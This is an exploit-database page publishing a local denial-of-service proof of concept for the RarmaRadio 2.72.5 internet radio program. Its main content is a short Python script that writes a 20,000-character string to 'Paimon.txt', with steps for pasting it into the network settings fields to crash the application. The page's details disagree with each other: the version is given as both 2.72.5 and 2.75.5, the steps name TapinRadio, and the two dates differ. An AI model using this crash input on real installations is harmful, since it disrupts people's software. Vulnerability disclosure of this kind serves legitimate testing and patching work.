RarmaRadio 2.72.5 Denial of Service (PoC)

2020.12.11
Credit: Ismael Nava
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC) # Date: 2020-05-12 # Exploit Author: Ismael Nava # Vendor Homepage: http://www.raimersoft.com/ # Software Link: https://www.raimersoft.com/rarmaradio.html # Version: 2.75.5 # Tested on: Windows 10 Home x64 # CVE : n/a #STEPS # Open the program TapinRadio # In Edit select Settings option # Click in Network # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Paimon.txt" # Paste the content in the field Username, Address and Server and click in OK # End :) buffer = 'K' * 20000 try: file = open("Paimon.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top